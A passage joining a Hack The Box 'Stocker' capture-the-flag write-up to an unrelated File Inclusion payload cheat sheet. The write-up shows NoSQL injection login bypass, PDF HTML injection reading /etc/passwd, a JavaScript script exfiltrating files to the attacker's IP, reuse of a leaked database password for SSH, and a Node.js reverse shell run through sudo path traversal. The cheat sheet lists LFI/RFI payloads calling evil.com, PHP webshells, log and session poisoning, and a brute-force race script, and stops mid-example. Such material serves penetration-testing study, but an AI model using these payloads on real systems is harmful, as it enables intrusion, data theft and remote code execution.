href="/login?error=login-error">/login?error=login-error</a></p> ``` The login page of the website was found to be vulnerable to NoSQL Injection as described in the source https://book.hacktricks.xyz/pentesting-web/nosql-injection. To exploit this vulnerability, we need to change the `Content-Type` to `application/json` and send a following payload: ```HTTP POST /login HTTP/1.1 Host: dev.stocker.htb User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://dev.stocker.htb/login Content-Type: application/json Content-Length: 54 Origin: http://dev.stocker.htb DNT: 1 Connection: close Cookie: connect.sid=s%3AtN-kXpz_f7SGn9BmNv4UXCAS9LlzwTFH.O%2F7ZQoR80qCnMZ%2FqU4sT8NFvVUBkTuLpV%2F5OuAKt6Jo Upgrade-Insecure-Requests: 1 {"username": {"$ne": null}, "password": {"$ne": null}} ``` The following response was received after sending the payload: ```HTTP HTTP/1.1 302 Found Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Feb 2023 13:56:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 56 Connection: close X-Powered-By: Express Location: /stock Vary: Accept <p>Found. Redirecting to <a href="/stock">/stock</a></p> ``` ![stock.JPG](images/stock.JPG) Upon adding items to the cart, the following is observed: ![cart.JPG](images/cart.JPG) Clicking on the `Submit Purchase` button results in the following: ![purchase.JPG](images/purchase.JPG) This corresponds to the following HTTP request: ```HTTP POST /api/order HTTP/1.1 Host: dev.stocker.htb User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://dev.stocker.htb/stock Content-Type: application/json Origin: http://dev.stocker.htb Content-Length: 162 DNT: 1 Connection: close Cookie: connect.sid=s%3A_C3kSkCujZj7USLqBfjWW5Yk1s__HyJt.NpaR9Big%2FUbENie5TrNkawmyz56AQRdEbjwbtmVjcec { "basket": [ { "_id": "638f116eeb060210cbd83a8d", "title": "Cup", "description": "It's a red cup.", "image": "red-cup.jpg", "price": 32, "currentStock": 4, "__v": 0, "amount": 1 } ] } ``` Clicking on the link `here` results in the download of the following PDF file: ![pdf.JPG](images/pdf.JPG) Upon inspecting the PDF file with the tool `exiftool`, it was discovered that the file was created using `Skia/PDF m108`: ```console โ”Œโ”€[evyatar9@parrot]โ”€[/hackthebox/Stocker] โ””โ”€โ”€โ•ผ $ exiftool document.pdf ExifTool Version Number : 12.16 File Name : document.pdf Directory : . File Size : 37 KiB File Modification Date/Time : 2023:02:03 16:45:50+02:00 File Access Date/Time : 2023:02:03 16:45:50+02:00 File Inode Change Date/Time : 2023:02:03 16:45:50+02:00 File Permissions : rwxrwx--- File Type : PDF File Type Extension : pdf MIME Type : application/pdf PDF Version : 1.4 Linearized : No Page Count : 1 Tagged PDF : Yes Creator : Chromium Producer : Skia/PDF m108 Create Date : 2023:02:03 14:45:18+00:00 Modify Date : 2023:02:03 14:45:18+00:00 ``` Our HTML code can be injected into this PDF file by using the following JSON payload: ```HTTP POST /api/order HTTP/1.1 Host: dev.stocker.htb User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://dev.stocker.htb/stock Content-Type: application/json Origin: http://dev.stocker.htb Content-Length: 227 DNT: 1 Connection: close Cookie: connect.sid=s%3A_C3kSkCujZj7USLqBfjWW5Yk1s__HyJt.NpaR9Big%2FUbENie5TrNkawmyz56AQRdEbjwbtmVjcec { "basket": [ { "_id": "638f116eeb060210cbd83a8d", "title": "<iframe src='file:///etc/passwd' width='500' height='1060'></iframe>", "description": "It's a red cup.", "image": "red-cup.jpg", "price": 32, "currentStock": 4, "__v": 0, "amount": 1 } ] } ``` By sending the payload, the following response was obtained: ```HTTP HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Feb 2023 12:43:43 GMT Content-Type: application/json; charset=utf-8 Content-Length: 53 Connection: close X-Powered-By: Express ETag: W/"35-qrQFK6xlPFMKT+7JQPQvpKDsH1s" {"success":true,"orderId":"63dd8e1f9d443a3cead86ef1"} ``` By accessing the URL http://dev.stocker.htb/api/po/63dd8ef49d443a3cead86ef6, we were able to retrieve the content of the file `/etc/passwd`: ![pdf.JPG](images/pdf.JPG) Using the [sendfile.js](./sendfile.js) script, we can read a local file on the server and send it as a base64 encoded string to our web server: ```javascript async function sendFileContent(filePath) { // Load the file content var fileContent = await loadFile(filePath); // Encode the file content as base64 var base64Content = btoa(fileContent); // Send the base64-encoded content to the server var response = await fetch(`http://10.10.14.14:8000/${base64Content}`); // Check the response status if (response.ok) { console.log("File content sent successfully"); } else { console.error("Failed to send file content"); } } async function loadFile(filePath) { return new Promise(function (resolve, reject) { var xhr = new XMLHttpRequest(); xhr.open("GET", filePath, true); xhr.responseType = "text"; xhr.onload = function () { if (xhr.readyState === xhr.DONE) { if (xhr.status === 200) { resolve(xhr.response); } else { reject(xhr.statusText); } } }; xhr.onerror = function () { reject(xhr.statusText); }; xhr.send(); }); } sendFileContent("/etc/passwd"); ``` The following request can be sent to include the script: ```HTTP POST /api/order HTTP/1.1 Host: dev.stocker.htb User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://dev.stocker.htb/stock Content-Type: application/json Origin: http://dev.stocker.htb Content-Length: 227 DNT: 1 Connection: close Cookie: connect.sid=s%3A_C3kSkCujZj7USLqBfjWW5Yk1s__HyJt.NpaR9Big%2FUbENie5TrNkawmyz56AQRdEbjwbtmVjcec { "basket": [ { "_id": "638f116eeb060210cbd83a8d", "title":"<script src='http://10.10.14.14:8000/sendfile.js'></script>", "description": "It's a red cup.", "image": "red-cup.jpg", "price": 32, "currentStock": 4, "__v": 0, "amount": 1 } ] } ``` And by analyzing the GET request, we can see that it is sending the base64 content of the local file `/etc/passwd`: ```console โ”Œโ”€[evyatar9@parrot]โ”€[/hackthebox/Stocker] โ””โ”€โ”€โ•ผ $ python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.11.196 - - [04/Feb/2023 01:14:13] "GET /sendfile.js HTTP/1.1" 200 - 10.10.11.196 - - [04/Feb/2023 01:14:14] code 404, message File not found 10.10.11.196 - - [04/Feb/2023 01:14:14] "GET /cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovdmFyL3J1bi9pcmNkOi91c3Ivc2Jpbi9ub2xvZ2luCmduYXRzOng6NDE6NDE6R25hdHMgQnVnLVJlcG9ydGluZyBTeXN0ZW0gKGFkbWluKTovdmFyL2xpYi9nbmF0czovdXNyL3NiaW4vbm9sb2dpbgpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMDoxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMToxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4Kc3lzdGVtZC10aW1lc3luYzp4OjEwMjoxMDQ6c3lzdGVtZCBUaW1lIFN5bmNocm9uaXphdGlvbiwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDY6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXNsb2c6eDoxMDQ6MTEwOjovaG9tZS9zeXNsb2c6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwNTo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnRzczp4OjEwNjoxMTI6VFBNIHNvZnR3YXJlIHN0YWNrLCwsOi92YXIvbGliL3RwbTovYmluL2ZhbHNlCnV1aWRkOng6MTA3OjExMzo6L3J1bi91dWlkZDovdXNyL3NiaW4vbm9sb2dpbgp0Y3BkdW1wOng6MTA4OjExNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCmxhbmRzY2FwZTp4OjEwOToxMTY6Oi92YXIvbGliL2xhbmRzY2FwZTovdXNyL3NiaW4vbm9sb2dpbgpwb2xsaW5hdGU6eDoxMTA6MTo6L3Zhci9jYWNoZS9wb2xsaW5hdGU6L2Jpbi9mYWxzZQpzc2hkOng6MTExOjY1NTM0OjovcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4Kc3lzdGVtZC1jb3JlZHVtcDp4Ojk5OTo5OTk6c3lzdGVtZCBDb3JlIER1bXBlcjovOi91c3Ivc2Jpbi9ub2xvZ2luCmZ3dXBkLXJlZnJlc2g6eDoxMTI6MTE5OmZ3dXBkLXJlZnJlc2ggdXNlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbW9uZ29kYjp4OjExMzo2NTUzNDo6L2hvbWUvbW9uZ29kYjovdXNyL3NiaW4vbm9sb2dpbgphbmdvb3NlOng6MTAwMToxMDAxOiwsLDovaG9tZS9hbmdvb3NlOi9iaW4vYmFzaApfbGF1cmVsOng6OTk4Ojk5ODo6L3Zhci9sb2cvbGF1cmVsOi9iaW4vZmFsc2UK HTTP/1.1" 404 - ``` By decoding the base64 content of the file, we get the contents of the `/etc/passwd` file: ```console root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:113::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:114::/nonexistent:/usr/sbin/nologin landscape:x:109:116::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin fwupd-refresh:x:112:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin mongodb:x:113:65534::/home/mongodb:/usr/sbin/nologin angoose:x:1001:1001:,,,:/home/angoose:/bin/bash _laurel:x:998:998::/var/log/laurel:/bin/false ``` We observe that the `angoose` user has a default shell of `/bin/bash`. We can employ a similar approach to read the `/etc/nginx/nginx.conf` file and obtain its contents: ```console user www-data; worker_processes auto; pid /run/nginx.pid; include /etc/nginx/modules-enabled/*.conf; events { worker_connections 768; # multi_accept on; } http { ## # Basic Settings ## sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 65; types_hash_max_size 2048; # server_tokens off; # server_names_hash_bucket_size 64; # server_name_in_redirect off; include /etc/nginx/mime.types; default_type application/octet-stream; ## # SSL Settings ## ssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3; # Dropping SSLv3, ref: POODLE ssl_prefer_server_ciphers on; ## # Logging Settings ## access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log; ## # Gzip Settings ## gzip on; # gzip_vary on; # gzip_proxied any; # gzip_comp_level 6; # gzip_buffers 16 8k; # gzip_http_version 1.1; # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript; ## # Virtual Host Configs ## include /etc/nginx/conf.d/*.conf; server { listen 80; root /var/www/dev; index index.html index.htm index.nginx-debian.html; server_name dev.stocker.htb; location / { proxy_pass http://127.0.0.1:3000; proxy_http_version 1.1; proxy_cache_bypass $http_upgrade; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection "upgrade"; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; proxy_set_header X-Forwarded-Host $host; proxy_set_header X-Forwarded-Port $server_port; } } server { listen 80; root /var/www/html; index index.html index.htm index.nginx-debian.html; server_name stocker.htb; location / { try_files $uri $uri/ =404; } } server { listen 80 default; server_name _; location / { return 301 http://stocker.htb; } } } ``` We can locate the `dev` virtual host at `/var/www/dev`, and read the contents of the `index.js` file located at `/var/www/dev/index.js`: ```javascript const express = require("express"); const mongoose = require("mongoose"); const session = require("express-session"); const MongoStore = require("connect-mongo"); const path = require("path"); const fs = require("fs"); const { generatePDF, formatHTML } = require("./pdf.js"); const { randomBytes, createHash } = require("crypto"); const app = express(); const port = 3000; // TODO: Configure loading from dotenv for production const dbURI = "mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1"; app.use(express.json()); app.use(express.urlencoded({ extended: false })); app.use( session({ secret: randomBytes(32).toString("hex"), resave: false, saveUninitialized: true, store: MongoStore.create({ mongoUrl: dbURI, }), }) ); app.use("/static", express.static(__dirname + "/assets")); app.get("/", (req, res) => { return res.redirect("/login"); }); app.get("/api/products", async (req, res) => { if (!req.session.user) return res.json([]); const products = await mongoose.model("Product").find(); return res.json(products); }); app.get("/login", (req, res) => { if (req.session.user) return res.redirect("/stock"); return res.sendFile(__dirname + "/templates/login.html"); }); app.post("/login", async (req, res) => { const { username, password } = req.body; if (!username || !password) return res.redirect("/login?error=login-error"); // TODO: Implement hashing const user = await mongoose.model("User").findOne({ username, password }); if (!user) return res.redirect("/login?error=login-error"); req.session.user = user.id; console.log(req.session); return res.redirect("/stock"); }); app.post("/api/order", async (req, res) => { if (!req.session.user) return res.json({}); if (!req.body.basket) return res.json({ success: false }); const order = new mongoose.model("Order")({ items: req.body.basket.map((item) => ({ title: item.title, price: item.price, amount: item.amount })), }); await order.save(); return res.json({ success: true, orderId: order._id }); }); app.get("/api/po/:id", async (req, res) => { const order = await mongoose.model("Order").findById(req.params.id); if (!order) return res.sendStatus(404); const htmlPath = `${__dirname}/pos/${req.params.id}.html`; const filePath = `${__dirname}/pos/${req.params.id}.pdf`; if (fs.existsSync(filePath)) { return res.sendFile(filePath); } fs.writeFileSync(htmlPath, formatHTML(order)); await generatePDF(req.params.id); if (fs.existsSync(filePath)) { return res.sendFile(filePath); } else { return res.sendStatus(500); } }); app.get("/stock", (req, res) => { if (!req.session.user) return res.redirect("/login?error=auth-required"); return res.sendFile(__dirname + "/templates/index.html"); }); app.get("/logout", async (req, res) => { req.session.user = ""; return res.redirect("/login"); }); app.listen(port, "127.0.0.1", async () => { await mongoose.connect(dbURI); // Setup Mongoose schema require("./schema.js"); console.log(`Example app listening on port ${port}`); }); ``` We observe that the credentials to access the MongoDB database are present in the code, specifically `const dbURI = "mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1";`. We have successfully utilized the password of the `dev` user (`IHeardPassphrasesArePrettySecure`) for the `angoose`user via SSH: ```console โ”Œโ”€[evyatar9@parrot]โ”€[/hackthebox/Stocker] โ””โ”€โ”€โ•ผ $ ssh [email protected] The authenticity of host 'stocker.htb (10.10.11.196)' can't be established. ECDSA key fingerprint is SHA256:DX/9+PB1w20dghcXwm9QPFH88qM0aiPr+RyA+wzHnng. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'stocker.htb,10.10.11.196' (ECDSA) to the list of known hosts. [email protected]'s password: The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. angoose@stocker:~$ cat user.txt 9a820c5a1676a0c62f24137079a9ea1a ``` And we get the user flag `9a820c5a1676a0c62f24137079a9ea1a`. ### Root By executing the command `sudo -l`, we can display the following information: ```console angoose@stocker:~$ sudo -l [sudo] password for angoose: Matching Defaults entries for angoose on stocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User angoose may run the following commands on stocker: (ALL) /usr/bin/node /usr/local/scripts/*.js ``` As we can see, we have the ability to run scripts located in `/usr/local/scripts/*.js` as the `root` user. To bypass this restriction, we can create a reverse shell in `/tmp` using the following code: ```console angoose@stocker:/tmp$ cat rev.js (function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(4242, "10.10.14.14", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application from crashing })(); ``` With the reverse shell created in `/tmp`, we can run the following command to execute our script: ```console angoose@stocker:/tmp$ sudo /usr/bin/node /usr/local/scripts/../../../tmp/rev.js [sudo] password for angoose: ``` Note that we need to navigate three directories up to `/` before accessing `/tmp/rev.js`. This will give us a reverse shell: ```console โ”Œโ”€[evyatar9@parrot]โ”€[/hackthebox/Stocker] โ””โ”€โ”€โ•ผ $ nc -lvp 4242 listening on [any] 4242 ... connect to [10.10.14.14] from stocker.htb [10.10.11.196] 38802 whoami root cat /root/root.txt 379e3da522f4948d9aee336caa1b1734 ``` And we get the root flag `379e3da522f4948d9aee336caa1b1734`.
# File Inclusion > The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. > The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application ## Summary * [Tools](#tools) * [Basic LFI](#basic-lfi) * [Null byte](#null-byte) * [Double encoding](#double-encoding) * [Path and dot truncation](#path-and-dot-truncation) * [Filter bypass tricks](#filter-bypass-tricks) * [Basic RFI](#basic-rfi) * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers) * [Wrapper php://filter](#wrapper-phpfilter) * [Wrapper zip://](#wrapper-zip) * [Wrapper data://](#wrapper-data) * [Wrapper expect://](#wrapper-expect) * [Wrapper input://](#wrapper-input) * [Wrapper phar://](#wrapper-phar) * [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd) * [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron) * [LFI to RCE via upload](#lfi-to-rce-via-upload) * [LFI to RCE via upload (race)](#lfi-to-rce-via-upload-race) * [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo) * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file) * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions) * [LFI to RCE via credentials files](#lfi-o-rce-via-credentials-files) ## Tools * [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) * [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) * [fimap - https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap) ## Basic LFI In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files. ```powershell http://example.com/index.php?page=../../../etc/passwd ``` ### Null byte :warning: In versions of PHP below 5.3 we can terminate with null byte. ```powershell http://example.com/index.php?page=../../../etc/passwd%00 ``` ### Double encoding ```powershell http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 ``` ### Path and dot truncation On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away. ```powershell http://example.com/index.php?page=../../../etc/passwd............[ADD MORE] http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE] http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd ``` ### Filter bypass tricks ```powershell http://example.com/index.php?page=....//....//etc/passwd http://example.com/index.php?page=..///////..////..//////etc/passwd http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd ``` ## Basic RFI Most of the filter bypasses from LFI section can be reused for RFI. ```powershell http://example.com/index.php?page=http://evil.com/shell.txt ``` ### Null byte ```powershell http://example.com/index.php?page=http://evil.com/shell.txt%00 ``` ### Double encoding ```powershell http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt ``` ### Bypass allow_url_include When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol. 1. Create a share open to everyone 2. Write a PHP code inside a file : `shell.php` 3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php` ## LFI / RFI using wrappers ### Wrapper php://filter The part "php://filter" is case insensitive ```powershell http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php ``` can be chained with a compression wrapper for large files. ```powershell http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd ``` NOTE: Wrappers can be chained multiple times : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s` ```powershell ./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php ``` ### Wrapper zip:// ```python echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php http://example.com/index.php?page=zip://shell.jpg%23payload.php ``` ### Wrapper data:// ```powershell http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4= NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>" ``` Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+` ### Wrapper expect:// ```powershell http://example.com/index.php?page=expect://id http://example.com/index.php?page=expect://ls ``` ### Wrapper input:// Specify your payload in the POST parameters, this can be done with a simple `curl` command. ```powershell curl -X POST --data "<?php echo shell_exec('id'); ?>" "https://example.com/index.php?page=php://input%00" -k -v ``` Alternatively, Kadimus has a module to automate this attack. ```powershell ./kadimus -u "https://example.com/index.php?page=php://input%00" -C '<?php echo shell_exec("id"); ?>' -T input ``` ### Wrapper phar:// Create a phar file with a serialized object in its meta-data. ```php // create new Phar $phar = new Phar('test.phar'); $phar->startBuffering(); $phar->addFromString('test.txt', 'text'); $phar->setStub('<?php __HALT_COMPILER(); ? >'); // add object of any class as meta data class AnyClass {} $object = new AnyClass; $object->data = 'rips'; $phar->setMetadata($object); $phar->stopBuffering(); ``` If a file operation is now performed on our existing Phar file via the phar:// wrapper, then its serialized meta data is unserialized. If this application has a class named AnyClass and it has the magic method __destruct() or __wakeup() defined, then those methods are automatically invoked ```php class AnyClass { function __destruct() { echo $this->data; } } // output: rips include('phar://test.phar'); ``` NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more. ## LFI to RCE via /proc/*/fd 1. Upload a lot of shells (for example : 100) 2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too) ## LFI to RCE via /proc/self/environ Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file ```powershell GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1 User-Agent: <?=phpinfo(); ?> ``` ## LFI to RCE via upload If you can upload a file, just inject the shell payload in it (e.g : `<?php system($_GET['c']); ?>` ). ```powershell http://example.com/index.php?page=path/to/uploaded/file.png ``` In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf ## LFI to RCE via upload (race) Worlds Quitest Let's Play" * Upload a file and trigger a self-inclusion. * Repeat 1 a shitload of time to: * increase our odds of winning the race * increase our guessing odds * Bruteforce the inclusion of /tmp/[0-9a-zA-Z]{6} * Enjoy our shell. ```python import itertools import requests import sys print('[+] Trying to win the race') f = {'file': open('shell.php', 'rb')} for _ in range(4096 * 4096): requests.post('http://target.com/index.php?c=index.php', f) print('[+] Bruteforcing the inclusion') for fname in itertools.combinations(string.ascii_letters + string.digits, 6): url = 'http://target.com/index.php?c=/tmp/php' + fname r = requests.get(url) if 'load average' in r.text: # <?php echo system('uptime'); print('[+] We have got a shell: ' + url) sys.exit(0) print('[x] Something went wrong, please try again') ``` ## LFI to RCE via phpinfo() https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py) ## LFI to RCE via controlled log file Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file. ```powershell http://example.com/index.php?page=/var/log/apache/access.log http://example.com/index.php?page=/var/log/apache/error.log http://example.com/index.php?page=/var/log/nginx/access.log http://example.com/index.php?page=/var/log/nginx/error.log http://example.com/index.php?page=/var/log/vsftpd.log http://example.com/index.php?page=/var/log/sshd.log http://example.com/index.php?page=/var/log/mail http://example.com/index.php?page=/var/log/httpd/error_log http://example.com/index.php?page=/usr/local/apache/log/error_log http://example.com/index.php?page=/usr/local/apache2/log/error_log ``` ### RCE via Mail First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`. ```powershell root@kali:~# telnet 10.10.10.10. 25 Trying 10.10.10.10.... Connected to 10.10.10.10.. Escape character is '^]'. 220 straylight ESMTP Postfix (Debian/GNU) helo ok 250 straylight mail from: [email protected] 250 2.1.0 Ok rcpt to: root 250 2.1.5 Ok data 354 End data with <CR><LF>.<CR><LF> subject: <?php echo system($_GET["cmd"]); ?> data2 . ``` In some cases you can also send the email with the `mail` command line. ```powershell mail -s "<?php system($_GET['cmd']);?>" [email protected]. < /dev/null ``` ## LFI to RCE via PHP sessions Check if the website use PHP Session (PHPSESSID) ```javascript Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/ Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly ``` In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files ```javascript /var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27. user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin"; ``` Set the cookie to `<?php system('cat /etc/passwd');?>` ```powershell login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php ``` Use the LFI to include the PHP session file ```powershell 